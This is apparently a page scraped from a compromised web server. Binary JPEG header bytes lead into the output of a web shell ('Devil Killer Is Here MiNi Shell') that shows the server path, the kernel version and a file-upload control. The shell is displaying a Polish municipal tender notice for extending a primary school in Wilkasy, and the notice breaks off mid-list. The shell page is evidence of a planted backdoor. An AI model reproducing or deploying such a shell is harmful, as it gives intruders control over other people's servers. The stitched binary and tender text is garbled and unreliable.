JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220221/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20220221/0006329402-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> „Rozbudowa Szkoły Podstawowej w Wilkasach o część dydaktyczną, stołówkę, zaplecze kuchenne i salę gimnastyczną wraz z inspektorem nadzoru inwestorskiego” </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">GMINA GIŻYCKO</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 790671225</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Mickiewicza 33</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Giżycko</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">11-500</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">warmińsko-mazurskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL623 - Ełcki</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">874299960</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">ugg@ugg.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.ugg.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> „Rozbudowa Szkoły Podstawowej w Wilkasach o część dydaktyczną, stołówkę, zaplecze kuchenne i salę gimnastyczną wraz z inspektorem nadzoru inwestorskiego” </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-9ca8f99d-9302-11ec-94c8-de8df8ed9da1</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00063294</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">02</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-02-21</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00031574/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.1 Rozbudowa Szkoły Podstawowej w Wilkasach o cześć dydaktyczną, stołówkę, zaplecze kuchenne i salę gimnastyczną wraz z inspektorem nadzoru inwestorskiego</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/ugg <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">Komunikacja między Wykonawcą a<br/>zamawiającym odbywa się za pośrednictwem https://platformazakupowa.pl/pn/ugg i formularza „Wyślij<br/>wiadomość do zamawiającego”. Za datę przekazania (wpływu) oświadczeń, wniosków,<br/>zawiadomień oraz informacji przyjmuje się datę ich przesłania za<br/>pośrednictwemhttps://platformazakupowa.pl/pn/ugg poprzez kliknięcie przycisku „Wyślij wiadomość do<br/>zamawiającego” po których pojawi się komunikat, że wiadomość została wysłana do zamawiającego.<br/>Zamawiający informuje, że instrukcje korzystania z platformazakupowa.pl dotyczące w<br/>szczególności logowania, składania wniosków o wyjaśnienie treści SWZ, składania ofert oraz innych<br/>czynności podejmowanych w niniejszym postępowaniu przy użyciu platformazakupowa.pl znajdują się<br/>w zakładce „Instrukcje dla Wykonawców&#34; na stronie internetowej pod<br/>adresem:https://platformazakupowa.pl/strona/45-instrukcje.</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Zgodnie z<br/>art 67 ustawy p.z.p., Zamawiający podaje wymagania techniczne związane z korzystaniem z<br/>Platformy:1) stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512<br/>kb/s,2) komputer klasy PC lub MAC o następującej konfiguracji: pamięć min. 2 GB Ram, procesor Intel<br/>IV 2 GHZ lub jego nowsza wersja, jeden z systemów operacyjnych - MS Windows 7, Mac Os x 10 4,<br/>Linux, lub ich nowsze wersje,3) zainstalowana dowolna przeglądarka internetowa, w przypadku<br/>Internet Explorer minimalnie wersja 10 0.,4) włączona obsługa JavaScript,5) zainstalowany program<br/>Adobe Acrobat Reader lub inny obsługujący format plików .pdf, 6) Platformazakupowa.pl działa<br/>według standardu przyjętego w komunikacji sieciowej - kodowanie UTF8,7) Oznaczenie czasu odbioru danych przez platformę zakupową stanowi datę oraz dokładny czas (hh:mm:ss) generowany wg. czasu<br/>lokalnego serwera synchronizowanego z zegarem Głównego Urzędu Miar. Ofertę oraz oświadczenia<br/>składa się, pod rygorem nieważności, w formie elektronicznej (tj. opatrzonej kwalifikowanym podpisem<br/>elektronicznym lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym.<br/>Dokumenty te powinny być podpisane przez osobę upoważnioną do<br/>reprezentowania Wykonawcy, zgodnie z formą reprezentacji Wykonawcy określoną w rejestrze<br/>lubinnym dokumencie, właściwym dla danej formy organizacyjnej Wykonawcy albo przez<br/>upełnomocnionego przedstawiciela Wykonawcy.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1. Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu<br/>Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w<br/>związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz<br/>uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o danych) (Dz. U. UE L119 z dnia 4 maja 2016<br/>r., str. 1; zwanym dalej „RODO”) informujemy, że:<br/>1) Administratorem Pani/Pana danych osobowych jest Gmina Giżycko ul. Mickiewicza 33, 11-500<br/>Giżycko, reprezentowana przez Wójta Gminy Giżycko.<br/>2) Administrator wyznaczył Inspektora Danych Osobowych, z którym można się kontaktować pod<br/>adresem e-mail: iod@ugg.pl<br/>3) Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu<br/>związanym z przedmiotowym postępowaniem o udzielenie zamówienia publicznego, prowadzonym w<br/>trybie przetargu nieograniczonego.<br/>4) Odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie<br/>dokumentacja postępowania w oparciu o art. 74 ustawy P.Z.P.<br/>5) Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 P.Z.P. przez okres 4 lat od<br/>dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4<br/>lata, okres przechowywania obejmuje cały czas trwania umowy;<br/>6) Obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest<br/>wymogiem ustawowym określonym w przepisanych ustawy P.Z.P., związanym z udziałem w<br/>postępowaniu o udzielenie zamówienia publicznego.<br/>7) W odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób<br/>zautomatyzowany, stosownie do art. 22 RODO.<br/>8) Posiada Pani/Pan:<br/>a) na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących (w<br/>przypadku, gdy skorzystanie z tego prawa wymagałoby po stronie administratora niewspółmiernie<br/>dużego wysiłku może zostać Pani/Pan zobowiązana do wskazania dodatkowych informacji mających<br/>na celu sprecyzowanie żądania, w szczególności podania nazwy lub daty postępowania o udzielenie<br/>zamówienia publicznego lub konkursu albo sprecyzowanie nazwy lub daty zakończonego<br/>postępowania o udzielenie zamówienia);<br/>b) na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych (skorzystanie z<br/>prawa do sprostowania nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia<br/>publicznego ani zmianą postanowień umowy w zakresie niezgodnym z ustawą PZP oraz nie może<br/>naruszać integralności protokołu oraz jego załączników);<br/>c) na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych<br/>osobowych z zastrzeżeniem okresu trwania postępowania o udzielenie zamówienia publicznego lub<br/>konkursu oraz przypadków, o których mowa w art. 18 ust. 2 RODO (prawo do ograniczenia<br/>przetwarzania nie ma zastosowania w odniesieniu do przechowywania, w celu zapewnienia korzystania ze środków ochrony prawnej lub w celu ochrony praw innej osoby fizycznej lub prawnej,lub<br/>z uwagi na ważne względy interesu publicznego Unii Europejskiej lub państwa członkowskiego);<br/>d) prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan,<br/>że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO;<br/>9) Nie przysługuje Pani/Panu:<br/>a) w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>b) prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>c) na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż<br/>podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO;<br/>10) przysługuje Pani/Panu prawo wniesienia skargi do organu nadzorczego na niezgodne z RODO<br/>przetwarzanie Pani/Pana danych osobowych przez administratora. Organem właściwym dla<br/>przedmiotowej skargi jest Urząd Ochrony Danych Osobowych, ul. Stawki 2, 00-193 Warszawa.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">RRG.271.7.2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">3</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na kilka części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.12.) Maksymalna liczba części, jaka może zostać udzielona jednemu wykonawcy: <span class="normal">2</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.14.) Określenie aspektów społecznych, środowiskowych lub etykiet w opisie przedmiotu zamówienia: </h3> <p class="mb-0">Zamawiający uwzględnił wymagania w zakresie dostępności dla osób niepełnosprawnych oraz projektowania z przeznaczeniem dla wszystkich użytkowników, zgodnie z art. 100 ust. 1 ustawy</p><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Zadanie 1<br/>1. Budowa części dydaktyczna z oddziałami przedszkolnymi, stołówką i zapleczem kuchennym,<br/>częścią administracyjną i biblioteką<br/>Budynek jest częściowo podpiwniczony i posiada dwie kondygnacje nadziemne. Wykonany<br/>zostanie w konstrukcji tradycyjnej – murowanej, pokryty zostanie dwuspadowym, płaskim<br/>stropodachem, o kącie nachylenia 50, pokrytym blachą. Budynek wyposażony jest we wszystkie<br/>niezbędne do jego funkcjonowania instalacje: wodną, kanalizacyjną, elektryczną i teletechniczną<br/>oraz w windę towarową do obsługi kuchni i stołówki.<br/>Parametry techniczne zaprojektowanego budynku:<br/>- powierzchnia rozbudowy - 638,8 m2<br/>- kubatura - 4 417,0 m3 <br/>- powierzchnia użytkowa - 1 290,0 m2 </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45210000-2 - Roboty budowlane w zakresie budynków</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">32412100-5 - Sieć telekomunikacyjna</p> <p class="mb-0">45111200-0 - Roboty w zakresie przygotowania terenu pod budowę i roboty ziemne</p> <p class="mb-0">45232000-2 - Roboty pomocnicze w zakresie rurociągów i kabli</p> <p class="mb-0">45300000-0 - Roboty instalacyjne w budynkach</p> <p class="mb-0">45311000-0 - Roboty w zakresie okablowania oraz instalacji elektrycznych</p> <p class="mb-0">45312100-8 - Instalowanie przeciwpożarowych systemów alarmowych</p> <p class="mb-0">45317000-2 - Inne instalacje elektryczne</p> <p class="mb-0">45317300-5 - Elektryczne elektrycznych urządzeń rozdzielczych</p> <p class="mb-0">45331100-7 - Instalowanie centralnego ogrzewania</p> <p class="mb-0">45332200-5 - Roboty instalacyjne hydrauliczne</p> <p class="mb-0">45332300-6 - Roboty instalacyjne kanalizacyjne</p> <p class="mb-0">45420000-7 - Roboty w zakresie zakładania stolarki budowlanej oraz roboty ciesielskie</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">11 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Oferta, która przedstawi najkorzystniejszy bilans (maksymalna liczba<br/>przyznanych punktów w oparciu o ustalone kryteria) zostanie uznana za najkorzystniejszą, pozostałe<br/>oferty zostaną sklasyfikowane zgodnie z ilością uzyskanych punktów. Zamawiający udzieli zamówienia<br/>Wykonawcy, którego oferta zostanie uznana za najkorzystniejszą. Jeżeli zamawiający nie będzie<br/>prowadził negocjacji, dokona wyboru najkorzystniejszej oferty spośród niepodlegających odrzuceniu<br/>ofert.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Gwarancja</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Zadanie 2<br/>Budowa sali gimnastycznej z łącznikiem.<br/>Budynek niepodpiwniczony, jednokondygnacyjny. Łącznik stanowi przedłużenie istniejącego<br/>ciągu komunikacyjnego i będzie prowadził do sali gimnastycznej i jej zaplecza z szatniami i<br/>sanitariatami, będzie posiadał wyjścia na zewnątrz zgodnie z wymogami ewakuacji z budynku.<br/>Wykonany zostanie w konstrukcji tradycyjnej murowanej, przykryty będzie jednospadowym,<br/>płaskim stropodachem o kącie nachylenia 30 i 5 0, pokryty blachą i warstwową płytą z<br/>termoizolacją, na wiązarach stalowych nad salą gimnastyczną. Budynek wyposażony jest we<br/>wszystkie niezbędne do jego funkcjonowania instalacje: wodną, kanalizacyjną, elektryczną i<br/>teletechniczną oraz w windę towarową do obsługi kuchni i stołówki.<br/>Parametry techniczne zaprojektowanego budynku:<br/>- powierzchnia rozbudowy - 591,4 m2<br/>- kubatura - 3 485,0 m3<br/>- powierzchnia użytkowa - 534,3 m2 </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45210000-2 - Roboty budowlane w zakresie budynków</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">32412100-5 - Sieć telekomunikacyjna</p> <p class="mb-0">45111200-0 - Roboty w zakresie przygotowania terenu pod budowę i roboty ziemne</p> <p class="mb-0">45232000-2 - Roboty pomocnicze w zakresie rurociągów i kabli</p> <p class="mb-0">45300000-0 - Roboty instalacyjne w budynkach</p> <p class="mb-0">45310000-3 - Roboty instalacyjne elektryczne</p> <p class="mb-0">45311000-0 - Roboty w zakresie okablowania oraz instalacji elektrycznych</p> <p class="mb-0">45312100-8 - Instalowanie przeciwpożarowych systemów alarmowych</p> <p class="mb-0">45314300-4 - Instalowanie infrastruktury okablowania</p> <p class="mb-0">45317300-5 - Elektryczne elektrycznych urządzeń rozdzielczych</p> <p class="mb-0">45331100-7 - Instalowanie centralnego ogrzewania</p> <p class="mb-0">45332200-5 - Roboty instalacyjne hydrauliczne</p> <p class="mb-0">45420000-7 - Roboty w zakresie zakładania stolarki budowlanej oraz roboty ciesielskie</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">11 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Oferta, która przedstawi najkorzystniejszy bilans (maksymalna liczba<br/>przyznanych punktów w oparciu o ustalone kryteria) zostanie uznana za najkorzystniejszą, pozostałe<br/>oferty zostaną sklasyfikowane zgodnie z ilością uzyskanych punktów. Zamawiający udzieli zamówienia<br/>Wykonawcy, którego oferta zostanie uznana za najkorzystniejszą. Jeżeli zamawiający nie będzie<br/>prowadził negocjacji, dokona wyboru najkorzystniejszej oferty spośród niepodlegających odrzuceniu<br/>ofert.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Gwarancja</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Zadanie 3<br/>1. Przedmiotem niniejszego zadania jest pełnienie obowiązków Inspektora Nadzoru z ramienia<br/>Zamawiającego nad inwestycją: „Rozbudowa Szkoły Podstawowej w Wilkasach o cześć<br/>dydaktyczną, stołówkę, zaplecze kuchenne i salę gimnastyczną wraz z inspektorem nadzoru<br/>inwestorskiego”<br/>Do obowiązków Inspektora Nadzoru należeć będzie bezpośredni nadzór nad prowadzonymi<br/>robotami w w/w zadaniu, których szczegółowy zakres określa: dokumentacja techniczna oraz<br/>przedmiary robót. W ramach jego zadania należeć będzie pełny zakres czynności, jaki dla<br/>Inspektora Nadzoru przewiduje art. 25, 26 i 27 aktualnie obowiązującej ustawy z dnia 7 lipca 1994 r. - Prawo budowlane i ponadto:<br/>a) zakres obowiązków:<br/>1) reprezentowanie inwestora na budowie przez sprawowanie kontroli zgodności jej realizacji z<br/>umową, obowiązującymi przepisami i Polskimi Normami oraz zasadami wiedzy technicznej,<br/>2) uczestniczenie w przekazaniu wykonawcy placu budowy,<br/>3) nadzorowanie wszelkich prób, badań, kontroli i sprawdzeń wymaganymi przepisami prawa,<br/>4) nadzór nad przestrzeganiem przez wykonawcę przepisów BHP łącznie z planem BIOZ,<br/>5) nadzorowanie dokonania wszelkich czynności formalnych wynikających z uzgodnień z<br/>poszczególnymi instytucjami podczas bieżącej realizacji robót,<br/>6) kontrola ilości i terminowości wykonania robót,<br/>7) nadzorowanie innych robót, które wynikają z dokumentacji,<br/>8) sprawdzenie jakości wykonanych robót, 